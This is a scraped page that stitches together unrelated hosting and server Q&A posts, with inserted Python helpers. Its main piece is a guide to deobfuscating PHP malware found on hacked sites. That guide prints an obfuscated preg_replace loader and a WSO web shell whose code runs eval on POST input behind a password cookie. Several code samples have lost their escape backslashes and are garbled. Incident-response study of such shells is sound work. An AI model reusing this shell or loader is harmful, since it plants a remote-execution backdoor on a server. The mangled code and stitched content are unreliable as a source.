Can we use a CA-signed certificate like Let’s Encrypt in SoftEther VPN Server?

I am trying to attach a Let’s Encrypt certificate to my VPN server, but didn’t find a way to do it. Can we use a CA-signed certificate like Let’s Encrypt in the VPN server? If yes, then please provide the process.


incident response – I found unknown PHP code on my server. How do I de-obfuscate the code?

Fortunately, almost all PHP scripts can be deobfuscated with 4 simple methods. We’re going to use these four methods to create a canonical answer.

Before we begin, let’s collect a list of common tools that assist in deobfuscating these malicious files so we can do the work ourselves.


Common tools that aid in deobfuscation

  1. UnPHP. This greatly aids in de-obfuscating scripts that have nested obfuscation in excess of 100 nested functions. In many cases, this website, and those like it, should be the first one for you to visit. However, in some cases, UnPHP cannot deobfuscate the initial payload. In those cases, other tools we’ll list will suffice.
  2. PHP Beautifier. This is an excellent tool for splitting up single-line files which are otherwise very difficult to read.
  3. Base64 decoders. I’m linking to Google search for this one. Some of these Base64 websites look kind of shady, so if you prefer to use an offline version without visiting those websites, I whipped up a quick tool for Windows (get Base64Decode.exe). Source code is available as well.
  4. PHP Sandbox. You can also look for other sandboxes on Google. We’ll use this to run echo commands when needed.

Commonly exploited PHP functions

The vast majority of hacks use some form of eval, or preg_replace, or both:

  1. eval(). This can be an evil function, as it allows arbitrary execution of PHP code. Just finding this function in use on your website could be an indication that you’ve been hacked.
  2. preg_replace(). Frequently used with eval() to allow for arbitrary code execution. There are plenty of good uses for preg_replace(), but if you don’t know how it got there, and especially if it appears alongside obfuscated code, that’s a clear indication that you’ve been hacked.
  3. Additional Information. To prevent this answer from becoming too large, I’m going to link to this question about commonly-exploited PHP functions.
  4. Also, check out the OWASP PHP Cheat Sheet.

While base64_decode is used in nearly all of the hacks we’ve come across, it mainly serves as a layer of obfuscation.


Common obfuscation formats

There are several different ways that hackers obfuscate their code. Let’s list some of the common techniques so we know how to spot them and then decode them:

  1. Hex Encoding. You’ll be looking for the HEX number on that table list. In PHP, these can be represented by backslash x, followed by a number or letter. Examples:

    • \x48 = H
    • \x34 = 4
    • \x78 = x

    However, they aren’t necessarily represented only by \x. They could be \# as well.

  2. Unicode strings. Almost the same as above, but \u# instead of \x#. Examples:

    • \u004D = M
    • \u0065 = e
    • \u0020 = (space)
    • \u0070 = p
    • \u006c = l
    • \u0073 = s
  3. Base64 encoding. Base64 is a bit different than the aforementioned methods of obfuscation, but is still relatively easy to decode. Example strings:

    • SSBsaWtlIGRvbnV0cw== = I like donuts
    • ZXZhbChiYXNlNjRfZGVjb2RlKCJoYXgiKSk7 = eval(base64_decode("hax"));
    • QXNzdW1pbmcgZGlyZWN0IGNvbnRyb2w= = Assuming direct control
  4. Garbage stored in a string, split by for loops, regex, etc. You’ll have to decode that yourself, as they vary considerably. Fortunately, many of the aforementioned methods should assist you in de-obfuscating this time.


How can I deobfuscate PHP Files by myself?

Because we cannot help (we can, I can, but they won’t let me! :P) with every single PHP malware snippet out there, it would be better to teach you how to do it.

Learning how to do this yourself will help you learn more about PHP, and more about what’s going on. Let’s put our tools to use, and use two previous examples of PHP deobfuscation on this website.


Deobfuscation Example #1

Refer to this question. Copy and paste the code into UnPHP:

<?php preg_replace("xf4x3041x1fx16351x42x45"^"xd730xf64773125340","373x49145xa9372xc0x72331307320175237xb412351x6cx69x6dx72302xe1117x67x8644xc7217x64260x31x78x99x9c200x4"^"2734013312x96265x16xbcx98xbfx13374xd1x7bx4b1532x8104xf6xbe532345113xa3352114x92155111xbbxb525177","20665x30x2f160x277x56x25x9axfx6xec317xebx10x86x0244364255x57x53xf3x8dxb913x5c2272xc5x97215347372x83x74367x28x2exd1x36x72177223x3cxb2x1ax96271127x3b337xcf277317xb74214271xb223571xa6x3d20532512733670xd6x7c"^"3127x58131x12x5515214615125076166210207x9bx22xdf127xccx9exe1144x11302324324x73x2c133213374xf8xe9240313xf0x38305x6ex54xb24x24x4f360105213152xf4xee64x4d275x88206xa1325x35265xc3xd0xca177xd5x5fxc6xe040274x55xb5x41"); ?>

And you’ll see it doesn’t deobfuscate it for us. Bummer. We’re going to have to do some extra work. Note the strings, along with its concatenations. Argh! It’s so ugly and confusing! What are we going to do with these strings? This is where the PHP sandbox comes into play.

<?php
    echo "xf4x3041x1fx16351x42x45"^"xd730xf64773125340" . "<br/>"; 
    echo "373x49145xa9372xc0x72331307320175237xb412351x6cx69x6dx72302xe1117x67x8644xc7217x64260x31x78x99x9c200x4"^"2734013312x96265x16xbcx98xbfx13374xd1x7bx4b1532x8104xf6xbe532345113xa3352114x92155111xbbxb525177" . "<br/>";
    echo "20665x30x2f160x277x56x25x9axfx6xec317xebx10x86x0244364255x57x53xf3x8dxb913x5c2272xc5x97215347372x83x74367x28x2exd1x36x72177223x3cxb2x1ax96271127x3b337xcf277317xb74214271xb223571xa6x3d20532512733670xd6x7c"^"3127x58131x12x5515214615125076166210207x9bx22xdf127xccx9exe1144x11302324324x73x2c133213374xf8xe9240313xf0x38305x6ex54xb24x24x4f360105213152xf4xee64x4d275x88206xa1325x35265xc3xd0xca177xd5x5fxc6xe040274x55xb5x41" . "<br/>";
?>

Now that we’ve echoed the contents, we can rebuild it to get the following results:

<?php
    preg_replace("#(.+)#ie", '@include_once(base64_decode("\1"));',
    "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc");
?>

Note the string, L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc? That looks an awful lot like the Base64 encoding we talked about earlier! Let’s try to decode it and see if we’re right:

/home4/mitzvahc/public_html/assets/img/logo_small.png

After opening the logo_small.png file in some kind of text editor, we find something like this:

eval(gzuncompress(base64_decode("evil_payload")));

Oh no!!!

OH NO!!!

If you run the file contents through UnPHP, you should get your decoded results.


Deobfuscation Example #2

Refer to this question:

Remember earlier when we mentioned ASCII encoding? Take a look at the code:

<?php 
    ${"x47LOBx41x4cx53"}("x76x72vwx65yx70x7anx69x70x75")="a";${"x47x4cOBALx53"}("x67x72x69ux65x66x62x64x71c")="x61x75x74hx5fpasx73";${"x47x4cOBALx53"}("x63x74xvx74x6fx6fx6bnx6dju")="x76";${"x47x4cOx42Ax4cS"}("px69x6fykcx65x61")="defx61ulx74x5fux73x65_x61jx61x78";${"x47x4cx4fx42x41x4cx53"}("ix77ix72x6dx78lx71tvx79p")="defax75x6cx74x5fx61x63tx69x6fx6e";${"x47Lx4fBx41x4cS"}("x64x77ex6dx62x6ax63")="x63x6flx6fx72";${${"x47x4cx4fx42x41LS"}("x64x77x65x6dbjx63")}="x23dx665";${${"x47Lx4fBx41x4cx53"}("x69x77x69rmx78x6cx71x74x76x79p")}="x46ix6cesMx61n";$oboikuury="x64ex66ax75x6ctx5fcx68x61x72x73x65t";${${"x47Lx4fx42x41x4cS"}("px69oyx6bcx65x61")}=true;${$oboikuury}="x57indowx73-1x325x31";@ini_set("x65rx72ox72_x6cog",NULL);@ini_set("lx6fg_erx72ors",0);@ini_set("max_exx65x63x75x74x69ox6ex5fx74imx65",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("WSx4fx5fVEx52Sx49ON","x32.5x2e1");if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"x47x4cx4fx42Ax4cx53"}("x7ax64x69zx62x73x75ex66a")="x61x72rx61x79";$cfnrvu="x61rx72ax79";${"GLOBx41Lx53"}("x6bx63x6ctx6cx70x64x73")="ax72x72x61x79";return is_array(${${"x47x4cOx42x41x4cx53"}("x7adx69x7abx73x75ex66x61")})?array_map("x57SOstx72x69x70x73x6cx61x73x68x65s",${${"x47x4cOx42x41LS"}("x6bx63x6cx74lx70x64x73")}):stripslashes(${$cfnrvu});}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function wsoLogin(){header("x48x54TP/1.x30x204x30x34x20x4eox74 x46ound");die("4x304");}function 
WSOsetcookie($k,$v){${"x47x4cOx42ALS"}("x67vfx6cx78mx74")="x6b";$cjtmrt="x76";$_COOKIE(${${"Gx4cx4fx42x41LS"}("x67x76x66x6cxmx74")})=${${"GLOx42x41x4cS"}("x63x74x78x76tx6fx6fknmx6ax75")};$raogrsixpi="x6b";setcookie(${$raogrsixpi},${$cjtmrt});}$qyvsdolpq="ax75x74x68x5fx70x61sx73";if(!empty(${$qyvsdolpq})){$rhavvlolc="aux74h_x70ax73x73";$ssfmrro="ax75tx68x5fpax73x73";if(isset($_POST("px61ss"))&&(md5($_POST("pax73x73"))==${$ssfmrro}))WSOsetcookie(md5($_SERVER("Hx54x54P_x48x4fx53T")),${${"x47Lx4fx42x41x4cx53"}("x67x72x69x75ex66bx64x71x63")});if(!isset($_COOKIE(md5($_SERVER("x48Tx54x50x5fx48Ox53x54"))))||($_COOKIE(md5($_SERVER("Hx54x54x50_Hx4fST")))!=${$rhavvlolc}))wsoLogin();}function actionRC(){if(!@$_POST("px31")){$ugtfpiyrum="a";${${"x47x4cx4fBx41LS"}("x76rx76wx65x79x70zx6eipu")}=array("x75nx61mx65"=>php_uname(),"px68x70x5fverx73x69ox6e"=>phpversion(),"x77sx6f_vx65x72six6fx6e"=>WSO_VERSION,"safx65mx6fx64e"=>@ini_get("x73x61x66x65x5fmx6fdx65"));echo serialize(${$ugtfpiyrum});}else{eval($_POST("x70x31"));}}if(empty($_POST("x61"))){${"x47Lx4fBx41LS"}("x69sx76x65x78x79")="x64x65x66x61x75x6ctx5fx61cx74ix6fx6e";${"x47x4cx4fx42x41x4cx53"}("x75x6fx65cx68x79x6dx7adx64x64")="x64x65x66ax75x6cx74_x61x63x74x69x6fn";if(isset(${${"x47Lx4fx42x41LS"}("x69x77irx6dx78lqtvx79x70")})&&function_exists("x61ctx69x6fx6e".${${"x47Lx4fx42x41x4cS"}("x75ox65chx79x6dx7ax64x64x64")}))$_POST("a")=${${"x47x4cx4fx42ALS"}("ix73x76ex78x79")};else$_POST("a")="x53ex63x49x6ex66o";}if(!empty($_POST("x61"))&&function_exists("actiox6e".$_POST("x61")))call_user_func("x61x63x74x69x6fx6e".$_POST("a"));exit;
?>

Let’s copy and paste this into UnPHP. Once the results are in, we can finally see what it’s doing, but it looks all smashed together. Let’s paste it into the PHP Beautifier. Now it’s a lot easier to read!


Deobfuscating variable names

If you’re not able to deobfuscate variable names through any of the previously-mentioned methods, then deobfuscating those variable names can be a manual, time-consuming process. Fortunately, common malware patterns, such as shutting off the log files, or using eval() or preg_replace() together with obfuscation, indicate that something is wrong.

Obfuscation is the wrong approach, so if you find code obfuscated on your website, you should assume you’ve been hacked. You should not be obfuscating your code. Security at the expense of usability is not security.


Deobfuscation Risks

Trying to decode these files on your own web server is not safe for a lot of reasons, some of which may be unknown to us. Do not try to deobfuscate PHP files on your own web server. You could inadvertently introduce additional backdoors, or assist the malware in spreading itself because many of the scripts load functions remotely.


That’s nice, but how did I get hacked?

This is really too broad to answer without us having access to everything on your web server, including logs.

You may have incorrect hardening on your Content Management System (CMS) installation, or there may be a vulnerability somewhere in your web stack. You can check these links if they’re part of your CMS:

  1. Joomla Security Checklist
  2. WordPress Hardening
  3. Drupal Security Checklist

If your CMS isn’t listed, look for hardening/security checklists for your CMS installation. If you are not using a CMS, but rather your own code, then it’s on you to fix your security holes. The OWASP Cheat Sheet serves as a good starting point to finding and fixing common vulnerabilities. Remember, only you can prevent shell access.

There could be any number of reasons why this is happening… but the bottom line is: either your web host has been hacked, or you have an exploit on your website which allows malicious individuals to insert additional code and give them full control over your website… meanwhile, they are attacking your visitors.


So what do I do?!

You should read this Q&A: How do I deal with a compromised server?
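The decoding steps in the answer above (the \x, octal and \u escapes from the list of common obfuscation formats, the "..."^"..." pairs of Example #1, and the base64 layer underneath) can all be done statically, on a copy of the file, without executing any of it. The Python below is an added example written for this page; it is not code from the original answer and not UnPHP. It reproduces what PHP’s double-quoted string parser and string ^ operator would produce, then base64-decodes any blob that comes out as readable text. The PHP snippet it runs on is a constructed sample in the style of Example #1, not the payload from the question.

```python
"""Offline helpers for peeling the obfuscation layers described above.

Constructed example for this page, not code from the original answer or
from UnPHP. It never runs the PHP: it only decodes string literals the way
PHP's double-quoted string parser would, applies the string ^ operator, and
base64-decodes candidates, so it can be used on a copy of a suspicious file
away from the web server.
"""
import base64
import re
import string
from typing import Dict, Optional

# PHP double-quoted escapes: \xHH, octal \NNN, \u{HHHH}, and single-char escapes.
_ESCAPE_RE = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|u\{[0-9A-Fa-f]+\}|.)", re.DOTALL)
_SIMPLE_ESCAPES = {"n": b"\n", "r": b"\r", "t": b"\t", "v": b"\v", "f": b"\f",
                   "e": b"\x1b", "\\": b"\\", '"': b'"', "$": b"$"}
# A double-quoted literal, allowing backslash-escaped characters inside it.
_DQ_LITERAL = r'"((?:[^"\\]|\\.)*)"'
_XOR_PAIR_RE = re.compile(_DQ_LITERAL + r"\s*\^\s*" + _DQ_LITERAL, re.DOTALL)
# Long runs of base64 alphabet characters, with optional padding.
_B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def php_unescape(literal: str) -> bytes:
    """Decode the body of a PHP double-quoted string into the bytes PHP would see."""
    out = bytearray()
    pos = 0
    for m in _ESCAPE_RE.finditer(literal):
        out += literal[pos:m.start()].encode("latin-1")
        esc = m.group(1)
        if esc[0] == "x" and len(esc) > 1:
            out.append(int(esc[1:], 16))            # \x48 -> H
        elif esc[0] in "01234567":
            out.append(int(esc, 8) & 0xFF)          # \110 -> H
        elif esc.startswith("u{"):
            out += chr(int(esc[2:-1], 16)).encode("utf-8")
        elif esc in _SIMPLE_ESCAPES:
            out += _SIMPLE_ESCAPES[esc]
        else:
            out += b"\\" + esc.encode("latin-1")    # PHP keeps unknown escapes verbatim
        pos = m.end()
    out += literal[pos:].encode("latin-1")
    return bytes(out)


def php_xor(a: bytes, b: bytes) -> bytes:
    """PHP's string ^ operator: byte-wise XOR, truncated to the shorter operand."""
    return bytes(x ^ y for x, y in zip(a, b))


def php_quote(raw: bytes) -> str:
    """Re-emit bytes as a readable PHP double-quoted literal."""
    printable = set(string.printable) - set("\t\n\r\x0b\x0c")
    pieces = []
    for ch in raw.decode("latin-1"):
        if ch in '"\\$':
            pieces.append("\\" + ch)
        elif ch in printable:
            pieces.append(ch)
        else:
            pieces.append("\\x%02x" % ord(ch))
    return '"' + "".join(pieces) + '"'


def resolve_xor_literals(php_source: str) -> str:
    """Replace every "..."^"..." pair in the source with the string it evaluates to."""
    def _sub(m):
        return php_quote(php_xor(php_unescape(m.group(1)), php_unescape(m.group(2))))
    return _XOR_PAIR_RE.sub(_sub, php_source)


def try_base64(token: str) -> Optional[str]:
    """Decode a base64 token (missing padding repaired); None unless the result is printable text."""
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except ValueError:          # binascii.Error is a ValueError
        return None
    text = raw.decode("ascii", errors="replace")
    return text if text and all(c in string.printable for c in text) else None


def find_base64_strings(php_source: str) -> Dict[str, str]:
    """Map every base64-looking token in the source to its decoded text."""
    found = {}
    for m in _B64_RE.finditer(php_source):
        decoded = try_base64(m.group(0))
        if decoded is not None:
            found[m.group(0)] = decoded
    return found


# Constructed sample in the style of Example #1 (not the original payload):
# "\x74\124R\50" ^ "\x11\x22\x33\x44" evaluates to "eval"; the base64 string is the
# path the answer above decodes.
SAMPLE = r'''<?php
$f = "\x74\124R\50"^"\x11\x22\x33\x44";
$p = "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc";
?>'''

if __name__ == "__main__":
    print(resolve_xor_literals(SAMPLE))
    for token, decoded in find_base64_strings(SAMPLE).items():
        print(token, "->", decoded)
```

Run it on a copy of the suspicious file by reading the file into `resolve_xor_literals` and `find_base64_strings`; each pass peels one layer, so the output of one pass is often the input of the next (as with the eval(gzuncompress(base64_decode(...))) layer in Example #1).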

email server – reverse DNS for shared hosting

I have a VPS and installed CWP on it to create hosts. This VPS has one IP, which I share among 5 hosts. I made an rDNS record for this IP: the rDNS address is rdns.aminrezaie.com for IP 192.119.70.158, and it is working correctly. I have a host on this VPS that is connected to another domain, aasal.cash. The problem is that when I try to send mail from aasal.cash addresses, it first goes to spam. I checked and tried more, and I fixed the mxtoolbox.com problems, but no chance. At last I found that the IP of the VPS is connected to rdns.aminrezaie.com, and maybe it is because of that, but I can’t change that rDNS. Is there any way to configure an IP address of a shared host with multiple rDNS entries?

lubuntu – TurboVNC for Ubuntu server, and set the only available desktop to be xfce4 for all users

I am setting up a new Ubuntu server for several users.
My target is that everyone can connect to it with TurboVNC by the server IP; when a user logs in to it, it will show the login screen, the user enters or chooses their user name, and then they get their own desktop environment.

Here are my questions:

1) lightdm.conf seems to be able to use [VNCServer] to generate the login screen for users, so that users can log in by the IP address without adding :1, :2, etc., but I could only achieve this with the default vnc (tightvnc?). How could I change to TurboVNC? Because it is called by /opt/Turbo/bin/vncserver, the [VNCServer] section in lightdm seems unable to call TurboVNC directly by that command.

2) I have tried to manually create the VNC server, and when I log in to it, it is the Lubuntu desktop. How could I change all the users’ default desktop to be xfce4 at once, and limit all users connecting from VNC so that they can only use that?

thank you for helping

domain name system – Static website I am hosting cannot be reached and the server IP cannot be found

I recently used Google Domains to register a domain and have connected it to Google Cloud Console to manage a static website. I followed the Google Codelabs guide to set it up and faced no issues. However, when refreshing my website, it still doesn’t load and my browser (Chrome) gives me the following error message:

This site can’t be reached

carbonfootprint.dev’s server IP address could not be found.

As well, going to www.carbonfootprint.dev gives me another error message:

Your connection is not private

Attackers might be trying to steal your information from www.carbonfootprint.dev (for example, passwords, messages, or credit cards).

NET::ERR_CERT_COMMON_NAME_INVALID

…Which is confusing, because I was under the impression that a .dev domain suffix gives SSL certification by default.

However, in my Google Domains settings, the website content appears as it should in the minimized preview that exists in both the Domain Overview panel and Website panel. It has been over 48 hours, so it should have updated by now if it were just a delay issue.

For reference, this is what my Custom resource records look like, and these are my bucket details in Google Cloud Console. If it matters, I am also using a Mac.

Any help is much appreciated!

8 – What does “The provided host name is not valid for this server” mean?

This error message is coming from a feature that was added to Drupal 8 to protect against HTTP Host header attacks. The feature is also described in the change record that was generated for the patch.

Essentially, it was possible to spoof the HTTP Host header for nefarious purposes, and trick Drupal into using a different domain name in several subsystems (particularly link generation). In other words, the HTTP Host header needs to be considered user input, and not trusted.

To combat this, a new setting, $settings['trusted_host_patterns'], was added to Drupal 8 to configure a list of “trusted” hostnames that the site can run from. The setting needs to be an array of regular expression patterns, without delimiters, representing the hostnames you would like to allow the site to run from.

For example, if you are running your site from a single hostname “www.example.com”, then you should add this to your settings (usually found at ./sites/default/settings.php):

$settings['trusted_host_patterns'] = array(
  '^www\.example\.com$',
);

Note the ^, \., and $. These are PCRE syntax. They just mean that you want to match “www.example.com” precisely, with nothing extra at the beginning and end, and that the dots should be treated as dots and not wildcard characters.

If you are running from “example.com”, then just use:

$settings['trusted_host_patterns'] = array(
  '^example\.com$',
);

If you need to run a site of multiple domains and/or subdomains, and are not doing canonical URL redirection, then your setting would look something like this:

$settings['trusted_host_patterns'] = array(
  '^example\.com$',
  '^.+\.example\.com$',
  '^example\.org',
  '^.+\.example\.org',
);

This allows the site to run off of all variants of example.com and example.org, with all subdomains included.

Once you adjust $settings['trusted_host_patterns'] to the proper value, you should be able to browse to your site again.

You can also check on the status of your trusted host settings from the status report page, which is at admin/reports/status.

If you remove the setting altogether, the trusted host mechanism will not be used, and you will see an error on the status report page. In addition, your site may also be vulnerable to HTTP Host header attacks.

If you have this setting configured and are seeing this message, then it probably means you have messed up the regular expression syntax. In this case, take the first example, and copy/paste into your settings, and then edit it to reflect the hostname your site runs from.
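Because the patterns are regular expressions, the quickest way to avoid the “messed up the regular expression syntax” case described above is to test them against the hostnames you expect (and a few you do not) before putting them in settings.php. The Python below is an added example for this page, not Drupal’s or Symfony’s code. It assumes, as I understand Drupal 8 to do, that each pattern is handed to Symfony’s Request::setTrustedHosts(), which wraps it as {pattern}i and runs preg_match against the request’s Host value; Python’s re stands in for PCRE, which is equivalent for patterns of this shape. The candidate Host values are constructed. It also shows two things the answer’s patterns make easy to get wrong: an unescaped dot matches any character, and a pattern without a trailing $ accepts any host that merely starts with the text.

```python
"""Test Drupal 8 trusted_host_patterns against hostnames before deploying them.

Constructed example for this page, not Drupal's or Symfony's code. Assumption:
Drupal passes each pattern to Symfony's Request::setTrustedHosts(), which wraps
it as {pattern}i (case-insensitive, no further anchoring) and runs preg_match
against the Host header. Python's re is used here in place of PCRE.
"""
import re
from typing import Dict, List


def host_is_trusted(host: str, patterns: List[str]) -> bool:
    """True if any pattern matches the host, case-insensitively.

    Anchoring is entirely up to the pattern: without ^ and $ a pattern
    accepts any host that merely contains the text.
    """
    return any(re.search(p, host, re.IGNORECASE) for p in patterns)


def invalid_patterns(patterns: List[str]) -> List[str]:
    """Return the patterns that fail to compile.

    A syntax error in one pattern is one way to end up with
    "The provided host name is not valid for this server" for every host.
    """
    bad = []
    for p in patterns:
        try:
            re.compile(p)
        except re.error:
            bad.append(p)
    return bad


def audit(patterns: List[str], hosts: List[str]) -> Dict[str, bool]:
    """Map each candidate Host value to whether the patterns would accept it."""
    return {h: host_is_trusted(h, patterns) for h in hosts}


# Patterns from the answer above, dots escaped as PCRE requires.
SINGLE_HOST = [r"^www\.example\.com$"]
# The same pattern with the dots left unescaped: "." then matches any character.
UNESCAPED = [r"^www.example.com$"]
# The multi-domain example; note the last two patterns have no trailing $.
MULTI_DOMAIN = [r"^example\.com$", r"^.+\.example\.com$",
                r"^example\.org", r"^.+\.example\.org"]

# Constructed Host values to check the patterns against (not from the page).
CANDIDATES = ["www.example.com", "WWW.EXAMPLE.COM", "wwwXexampleXcom",
              "www.example.com.test", "shop.example.com", "example.org.test"]

if __name__ == "__main__":
    for name, pats in (("single", SINGLE_HOST), ("unescaped", UNESCAPED),
                       ("multi", MULTI_DOMAIN)):
        print(name, audit(pats, CANDIDATES))
    print("invalid:", invalid_patterns([r"^example\.com$", r"^example\.com("]))
```

For a site that should answer on an exact list of names, the first form (anchored with ^ and $, dots escaped) is the one to copy; the subdomain wildcard patterns are for the multi-domain case the answer describes, and adding $ to them keeps them from matching longer hostnames that only begin with your domain.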

email – 550 Please turn on SMTP Authentication in your mail client. server without authentication

I got this message in my Gmail when I sent to my Zoho professional mail.
I checked all MX and CNAME records.

Everything is alright; it works perfectly on my web form, but not on Gmail when sending an email to my
Zoho mail.

On my Track EMail Delivery :
Rejected relay attempt:………

Has anyone had this problem before?
Help?

Enable PHP logging in Azure App Server (WebApp)

This has been asked a handful of times, but in 2020 the accepted solution doesn’t appear to work. I have uploaded my PHP files to /site/wwwroot and inside the same wwwroot created a php.ini file with only one line entry:

display_errors=On

I also created an App Setting for my WebApp with the key name PHP_INI_SCAN_DIR and the value shown in my screenshot.

The website has been restarted. Still no PHP errors displaying. I get a blank page.

locking – SQL Server: When is a real shared (S, not IS) lock acquired on a page of a clustered index?

All the explanations I find seem to indicate that, without special hints (which is the case in our software), shared locks are only acquired for keys, with IS locks at page and object level (and, yes, an S lock on the database).

Lock escalation of S row (key) locks escalates to the table (object) level, so no S page locks can result from this, if I’m correct here.

And foreign key constraint checking also gets (transaction-wide) S locks on keys, if I understand it correctly (see my other question for this).

However, we see lots of S (not IS) page locks in a simple ETL process (doing simple UPDATEs/INSERTs and some DELETEs from a connected server). Where could they come from?

Thanks!
Harald M.